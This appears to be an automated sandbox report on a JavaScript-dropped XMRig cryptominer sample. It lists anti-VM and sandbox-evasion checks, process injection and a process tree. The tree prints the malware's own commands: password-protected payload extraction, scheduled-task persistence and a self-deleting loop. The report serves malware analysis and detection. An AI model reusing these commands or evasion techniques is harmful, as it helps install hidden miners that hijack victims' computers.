xmrig | 4e0ddcd303f27c01dcc8a35a9bd821c53fb7dcca474ac7f0c84d3c6451e9f778

Resubmissions

09-04-2024 13:34

240409-qvlrtabe9s 10

09-04-2024 13:34

09-04-2024 13:33

09-04-2024 13:33

07-07-2023 11:45

Analysis

max time kernel
126s
max time network
287s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
14-04-2024 10:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MsMpEng.js
Size

24.2MB
MD5

690d57b0d8670391bad0876cae078bab
SHA1

32bea01d606128c606b71e19920099c6cb15030f
SHA256

b27dd5407a22c8df93090fbc1a3eb93c6461f4a279cfabd87b4b21e246bda458
SHA512

dd113765cd5cfeb99a98775c3c8e265463fca7863ffa519dcb7175312bbbeb4ea24ca45b4cef0320b430d413c020970346f4db671e0730e9e044cd2585f71fd4
SSDEEP

49152:34aSO/UYGzBMZ09d1X5EdS76+B0RX8DQQs8ReDlpgU3HApVeOGMmb5cUNWcGTRPk:H

Score

10^/10

xmrig evasion miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	x.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral17/memory/2252-3376-0x0000000000150000-0x0000000000C61000-memory.dmp	xmrig
behavioral17/memory/2252-3393-0x0000000000150000-0x0000000000C61000-memory.dmp	xmrig

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	x.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	x.exe

Executes dropped EXE 13 IoCs

pid	Process
2712	x.exe
2704	CL_Debug_Log.txt
1820	Helper.exe
2944	Helper.exe
2412	Helper.exe
1472	Helper.exe
2160	Helper.exe
1488	tor.exe
1164	Helper.exe
2368	Helper.exe
1020	Helper.exe
1704	Helper.exe
856	Helper.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Wine	x.exe

Loads dropped DLL 12 IoCs

pid	Process
2712	x.exe
2500	taskeng.exe
2780	Process not Found
1472	Helper.exe
1472	Helper.exe
1488	tor.exe
1488	tor.exe
1488	tor.exe
1488	tor.exe
1488	tor.exe
1488	tor.exe
2456	Process not Found

AutoIT Executable 4 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral17/memory/2712-7-0x0000000000240000-0x0000000001466000-memory.dmp	autoit_exe
behavioral17/files/0x0006000000015d0f-31.dat	autoit_exe
behavioral17/memory/2712-40-0x0000000000240000-0x0000000001466000-memory.dmp	autoit_exe
behavioral17/files/0x0008000000015cfe-37.dat	autoit_exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1472 set thread context of 2160	1472	Helper.exe	50
PID 1472 set thread context of 856	1472	Helper.exe	294
PID 1472 set thread context of 2252	1472	Helper.exe	296

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2432	schtasks.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
2876	timeout.exe
3004	timeout.exe
3048	timeout.exe
2820	timeout.exe
1400	timeout.exe
1960	timeout.exe
1076	timeout.exe
1200	timeout.exe
1940	timeout.exe
2768	timeout.exe
1976	timeout.exe
1600	timeout.exe
2972	timeout.exe
1644	timeout.exe
3068	timeout.exe
1560	timeout.exe
2824	timeout.exe
600	timeout.exe
1612	timeout.exe
1168	timeout.exe
1564	timeout.exe
2272	timeout.exe
784	timeout.exe
2348	timeout.exe
2732	timeout.exe
788	timeout.exe
1600	timeout.exe
2000	timeout.exe
1624	timeout.exe
2060	timeout.exe
1732	timeout.exe
2908	timeout.exe
1096	timeout.exe
2852	timeout.exe
1980	timeout.exe
2156	timeout.exe
2252	timeout.exe
2920	timeout.exe
3040	timeout.exe
2548	timeout.exe
2960	timeout.exe
2264	timeout.exe
2112	timeout.exe
1980	timeout.exe
580	timeout.exe
2544	timeout.exe
1748	timeout.exe
1864	timeout.exe
1728	timeout.exe
1620	timeout.exe
1072	timeout.exe
2280	timeout.exe
2912	timeout.exe
1868	timeout.exe
2032	timeout.exe
648	timeout.exe
1864	timeout.exe
1904	timeout.exe
1956	timeout.exe
1988	timeout.exe
2460	timeout.exe
1212	timeout.exe
2036	timeout.exe
2872	timeout.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\SCFGBRBT\root\CIMV2	Helper.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeRestorePrivilege	2704	CL_Debug_Log.txt
Token: 35	2704	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2704	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2704	CL_Debug_Log.txt
Token: SeRestorePrivilege	2160	Helper.exe
Token: 35	2160	Helper.exe
Token: SeSecurityPrivilege	2160	Helper.exe
Token: SeSecurityPrivilege	2160	Helper.exe
Token: SeRestorePrivilege	856	Helper.exe
Token: 35	856	Helper.exe
Token: SeSecurityPrivilege	856	Helper.exe
Token: SeSecurityPrivilege	856	Helper.exe
Token: SeLockMemoryPrivilege	2252	attrib.exe
Token: SeLockMemoryPrivilege	2252	attrib.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2712	x.exe
2712	x.exe
2712	x.exe
2944	Helper.exe
2944	Helper.exe
2944	Helper.exe
1820	Helper.exe
1820	Helper.exe
1820	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
2412	Helper.exe
2412	Helper.exe
2412	Helper.exe
1164	Helper.exe
1164	Helper.exe
1164	Helper.exe
2368	Helper.exe
2368	Helper.exe
2368	Helper.exe
1020	Helper.exe
1020	Helper.exe
1020	Helper.exe
2252	attrib.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2712	x.exe
2712	x.exe
2712	x.exe
2944	Helper.exe
2944	Helper.exe
2944	Helper.exe
1820	Helper.exe
1820	Helper.exe
1820	Helper.exe
1472	Helper.exe
1472	Helper.exe
1472	Helper.exe
2412	Helper.exe
2412	Helper.exe
2412	Helper.exe
1164	Helper.exe
1164	Helper.exe
1164	Helper.exe
2368	Helper.exe
2368	Helper.exe
2368	Helper.exe
1020	Helper.exe
1020	Helper.exe
1020	Helper.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1988 wrote to memory of 2712	1988	wscript.exe	28
PID 1988 wrote to memory of 2712	1988	wscript.exe	28
PID 1988 wrote to memory of 2712	1988	wscript.exe	28
PID 1988 wrote to memory of 2712	1988	wscript.exe	28
PID 2712 wrote to memory of 2704	2712	x.exe	29
PID 2712 wrote to memory of 2704	2712	x.exe	29
PID 2712 wrote to memory of 2704	2712	x.exe	29
PID 2712 wrote to memory of 2704	2712	x.exe	29
PID 2712 wrote to memory of 2600	2712	x.exe	31
PID 2712 wrote to memory of 2600	2712	x.exe	31
PID 2712 wrote to memory of 2600	2712	x.exe	31
PID 2712 wrote to memory of 2600	2712	x.exe	31
PID 2600 wrote to memory of 2432	2600	cmd.exe	150
PID 2600 wrote to memory of 2432	2600	cmd.exe	150
PID 2600 wrote to memory of 2432	2600	cmd.exe	150
PID 2600 wrote to memory of 2432	2600	cmd.exe	150
PID 2712 wrote to memory of 1928	2712	x.exe	35
PID 2712 wrote to memory of 1928	2712	x.exe	35
PID 2712 wrote to memory of 1928	2712	x.exe	35
PID 2712 wrote to memory of 1928	2712	x.exe	35
PID 1928 wrote to memory of 2108	1928	cmd.exe	37
PID 1928 wrote to memory of 2108	1928	cmd.exe	37
PID 1928 wrote to memory of 2108	1928	cmd.exe	37
PID 1928 wrote to memory of 2108	1928	cmd.exe	37
PID 2500 wrote to memory of 2944	2500	taskeng.exe	173
PID 2500 wrote to memory of 2944	2500	taskeng.exe	173
PID 2500 wrote to memory of 2944	2500	taskeng.exe	173
PID 2500 wrote to memory of 1820	2500	taskeng.exe	175
PID 2500 wrote to memory of 1820	2500	taskeng.exe	175
PID 2500 wrote to memory of 1820	2500	taskeng.exe	175
PID 1928 wrote to memory of 3040	1928	cmd.exe	40
PID 1928 wrote to memory of 3040	1928	cmd.exe	40
PID 1928 wrote to memory of 3040	1928	cmd.exe	40
PID 1928 wrote to memory of 3040	1928	cmd.exe	40
PID 1928 wrote to memory of 2720	1928	cmd.exe	41
PID 1928 wrote to memory of 2720	1928	cmd.exe	41
PID 1928 wrote to memory of 2720	1928	cmd.exe	41
PID 1928 wrote to memory of 2720	1928	cmd.exe	41
PID 1928 wrote to memory of 2828	1928	cmd.exe	42
PID 1928 wrote to memory of 2828	1928	cmd.exe	42
PID 1928 wrote to memory of 2828	1928	cmd.exe	42
PID 1928 wrote to memory of 2828	1928	cmd.exe	42
PID 2944 wrote to memory of 2412	2944	Helper.exe	179
PID 2944 wrote to memory of 2412	2944	Helper.exe	179
PID 2944 wrote to memory of 2412	2944	Helper.exe	179
PID 1928 wrote to memory of 1072	1928	cmd.exe	44
PID 1928 wrote to memory of 1072	1928	cmd.exe	44
PID 1928 wrote to memory of 1072	1928	cmd.exe	44
PID 1928 wrote to memory of 1072	1928	cmd.exe	44
PID 1820 wrote to memory of 1472	1820	Helper.exe	45
PID 1820 wrote to memory of 1472	1820	Helper.exe	45
PID 1820 wrote to memory of 1472	1820	Helper.exe	45
PID 1928 wrote to memory of 2732	1928	cmd.exe	46
PID 1928 wrote to memory of 2732	1928	cmd.exe	46
PID 1928 wrote to memory of 2732	1928	cmd.exe	46
PID 1928 wrote to memory of 2732	1928	cmd.exe	46
PID 1928 wrote to memory of 2760	1928	cmd.exe	47
PID 1928 wrote to memory of 2760	1928	cmd.exe	47
PID 1928 wrote to memory of 2760	1928	cmd.exe	47
PID 1928 wrote to memory of 2760	1928	cmd.exe	47
PID 1928 wrote to memory of 2776	1928	cmd.exe	48
PID 1928 wrote to memory of 2776	1928	cmd.exe	48
PID 1928 wrote to memory of 2776	1928	cmd.exe	48
PID 1928 wrote to memory of 2776	1928	cmd.exe	48

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2252	attrib.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\MsMpEng.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1988
- C:\Users\Admin\AppData\Local\Temp\x.exe
  "C:\Users\Admin\AppData\Local\Temp\x.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
    C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
      4⤵
      Creates scheduled task(s)
      PID:2432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c For /L %i In (0,0,0) Do (del "C:\Users\Admin\AppData\Local\Temp\x.exe"&&timeout /t 0&&if not exist "C:\Users\Admin\AppData\Local\Temp\x.exe" exit)
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1928
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2108
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:3040
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2720
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2828
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1072
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2732
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2760
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2776
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2716
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2952
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:556
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1076
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2292
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1740
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1732
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1868
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1144
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1864
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2272
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1728
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2228
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2104
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1876
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:580
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:684
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:784
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:392
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:788
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1168
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1500
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:600
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:648
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1600
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:404
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2876
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2656
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2868
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:792
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1980
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1792
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1416
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1560
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1440
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2028
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:980
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1308
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:804
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1164
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2032
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1636
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2016
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2036
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2000
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:908
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:984
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:960
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1200
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1216
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2328
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2896
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1912
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2976
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1532
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:3064
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2924
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:620
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1680
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2824
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1684
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:3052
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2972
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:900
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1904
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2348
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1644
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2908
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2904
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2912
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1604
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1920
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1716
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1612
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2708
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:3004
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:3008
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1268
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2516
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1940
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1624
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1956
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1344
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1988
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2872
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2692
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2576
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2560
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2568
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2460
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2804
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2596
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2672
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2552
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2572
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2696
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2492
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2452
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2432
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2548
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2436
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2512
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2948
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:3036
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:3048
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2376
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1212
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2280
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2156
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2072
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2544
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2580
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2584
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2648
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2676
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2712
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1936
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2524
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2748
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2960
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2680
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2944
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1652
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1820
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2752
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2768
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2504
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2412
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2820
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2424
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2740
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1888
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1748
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:3068
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2308
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2320
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2936
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1784
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:1096
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:556
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:764
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2252
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1584
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2060
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1700
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2256
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      Delays execution with timeout.exe
      PID:2264
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:1880
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2836
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 0
      4⤵
      PID:2796
